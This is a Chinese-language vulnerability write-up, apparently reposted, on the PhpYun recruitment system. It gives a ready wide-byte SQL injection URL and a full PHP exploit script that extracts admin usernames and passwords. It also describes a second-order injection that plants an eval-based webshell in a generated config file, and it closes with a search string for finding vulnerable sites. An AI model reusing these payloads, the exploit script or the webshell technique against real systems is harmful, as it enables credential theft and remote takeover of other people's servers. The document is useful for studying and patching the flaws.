PhpYun人才系统通杀注入及代码执行漏洞漏洞预警 -电脑资料

PhpYun人才系统是php业界著名门户网站php100重磅推出的一套开源人才系统，因php100在业界的地位而迅速被站长选用，但毕竟是新生事物，其代码在安全性上存在严重安全问题，

PhpYun人才系统通杀注入及代码执行漏洞漏洞预警

1.宽字节注入

漏洞描述

系统在config/db.safety.php中定义如下代码:

function quotesGPC() {

$_POST = array_map("addSlash", $_POST);

$_GET = array_map("addSlash", $_GET);

$_COOKIE = array_map("addSlash", $_COOKIE);

}

function addSlash($el) {

if (is_array($el))

return array_map("addSlash", $el);

else

return addslashes($el);

}

这段代码强制对变量进行了gpc转换，以增加安全性，但是令人费解的是这段代码根本没有在系统中调用，导致php在gpc关闭的情况下，可以直接对系统进行注入。由于一般php的gpc是默认开启，系统的所有查询变量在sql语句中均有单引号包围，并对inti型变量进行了强制转换，所以稍微显得有点鸡肋。

但由于整套系统采用gbk编码，而且没有做相应的字符过滤，在大部分地方导致宽字节注入。

如下代码：

if(isset($_GET[search])){

....省略部分无关代码//公司类型

$where=!empty($_GET[exp])? "and a.`exp`='$_GET[exp]' ":null;//公司类型

$where.=!empty($_GET[edu])? "and a.`edu`='$_GET[edu]' ":null;//学历

$where.=!empty($_GET[salary])? "and a.`salary`='$_GET[salary]' ":null;//月薪

$where.=$_GET[keyword]!="关键字"? "and a.`name` like '%$_GET[keyword]%' ":null;//关键字

.....省略部分无关代码

$select="a.`id`,a.`uid`,a.`name` as `jobname`,a.`number`,b.`name`,a.`provinceid` as`jobcity`,a.`lastupdate`,a.`salary`,a.`description`,a.`edu`,b.`pr`,b.`mun`";

$searchsql=$obj->DB_select_alls("company_job","company","1 $where order by `lastupdate` desc limit $firstcount,$displaypg",$select)

变量没有进行任何验证即带入查询语句，在gpc开启的情况下用%df'作为keywords查询即可闭合sql查询的单引号实现注入，爆出账号和密码。

利用方式：

精心构造注入语句

http://www.hackqing.cn/search.php?keyword=php%df%27%20or%201=2%20union%20select%201,2,concat(0x40,0x23,username,0x7e,password,0x23,0x40),4,5,6,7,8,9,0,11,12%20from%20phpyun_admin_user--%20sdfsd&provinceid=&mySearchCityName=&mySearchCity=&search=%CB%D1%CB%F7,

即可注入出后台账号和密码。

附上exp:

<?php

/*

*Php Yun 人才系统宽字节编码注入exp

**/

print_r('

+--------------------------------------------------------------------+

PhpYun RenCai System Remove SQL Injection Exploit

By l4yn3

Blog http://hi.baidu.com/l4yn3

+--------------------------------------------------------------------+

');

{

print_r('

+-----------------------------------------------------------------+

Example:

php '.$argv[0].' localhost

+-----------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

echo "Waiting, exploiting......\r\n";

$data = Hacking();

preg_match("/@#(\S+)#@/isU", $data, $note);

if(!isset($note[1]) empty($note[1]))

{

exit('Exploit failed!');

exit;

}

else

{

$res_arr = explode('~', $note[1]);

print("

Exploit successed!\r\n

Name:".$res_arr[0]."\r\n

PassWord:".$res_arr[1]."\r\n

Good Luck to you!

----l4yn3

");

exit;

}

function Hacking()

{

global $host, $path;

$data = "GET /search.php?keyword=php%df%27%20or%201=2%20union%20select%201,2,concat(0x40,0x23,username,0x7e,password,0x23,0x40),4,5,6,7,8,9,0,11,12%20from%20phpyun_admin_user--%20sdfsd&provinceid=&mySearchCityName=&mySearchCity=&search=%CB%D1%CB%F7 HTTP/1.1\r\n"; ////@#

$data .= "Host: $host\r\n";

$data .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);

fputs($fp, $data);

$res = '';

while($fp && !feof($fp))

{

$res .= fread($fp, 1024);

}

fclose($fp);

return $res;

}

2.后台代码执行

漏洞描述

系统对相关配置信息的处理流程为 配置信息入库

电脑资料

看以下代码：

admin/admin_city.php

if($_POST[madeprovince]){

if(!empty($_POST[provinceid])){

$value="`name`='".$_POST[provinceid]."',`keyid`='0',`sort`='0'";

$city1=$acts->DB_insert_once("calss_city","$value"); //没做任何过滤，直接插入 ---l4yn3

!empty($city1)?$acts->get_admin_msg("admin_city.php","添加成功"):$acts->get_admin_msg("admin_city.php","添加失败，请销后再试");

}else{

$acts->get_admin_msg("admin_city.php","请正确填写你要添加的城市");

}

}

admin/admin_make.php

if($_GET[make]=='area'){

$data .= "<?php \n \$data_area=array(";

foreach($acts->DB_select_all("calss_city") as $v){

$data .="'$v[0]'=>'$v[1]',\n";

}

$data .= "'1983223'=>'PHP100'); \n ?>";

$returnif=true;//从库里取出配置信息 l4yn3

}

............... 省略部分代码

if(!empty($data) && $returnif){

$open=fopen(CONFIG_PATH.'db.data.'.$_GET[make].'.php','w+');

$fw=fwrite($open,$data);//没做任何处理，直接写入配置文件，典型的二次攻击

fclose($open);

if(!empty($fw)){

$acts->get_admin_msg("admin_job.php","更新成功！");

}

}

添加省份信息的代码没有任何过滤直接插入数据库（肯定注入了），然后再另外一个文件里直接把配置信息取出来写入缓存文件，导致典型的二次注入攻击。

我们看一下配置文件的格式。

<?php

$data_area=array('1'=>'北京',

'2'=>'上海',

'3'=>'天津',

'4'=>'重庆',

'5'=>'河北'）；

及时gpc转换开启，我们添加的时候被转义，但是存到库里也就是干净的了，在取出来写入缓存，造成典型的二次攻击。我们从数据库里面读出来的省份为'.@eval($_REQUEST['cmd']).'123，那写入配置文件后就变成了'495'=>''.@eval($_REQUEST['cmd']).'123',，成功闭合数组的单引号，执行我们的php代码。

而插入的内容又是我们控制的。

利用方法

在‘地区配置’处添加一级城市名称。如果gpc转换关闭，那我们需要添加为\'.@eval($_REQUEST[\'cmd\']).\'123，我们要对我们添加的单引号进行模拟转义，这样添加到库里才能成为'.@eval($_REQUEST['cmd']).'123，然后被写入执行，避免添加失败的错误。如果gpc开启则直接添加 '.@eval($_REQUEST['cmd']).'123，因为gpc已经给我们转义好了。所以流程是先添加'.@eval($_REQUEST['cmd']).'123，提示失败，则说明gpc关闭了，sql没有正常执行，那再重新添加\'.@eval($_REQUEST[\'cmd\']).\'123，对单引号进行转义，添加成功。然后手动访问admin/admin_malke.php?make=area，提示成功生成配置文件，然后用客户端文件/config/db.data.area.php,就是我们的一句话。

查找关键词:Powered by PHPYun.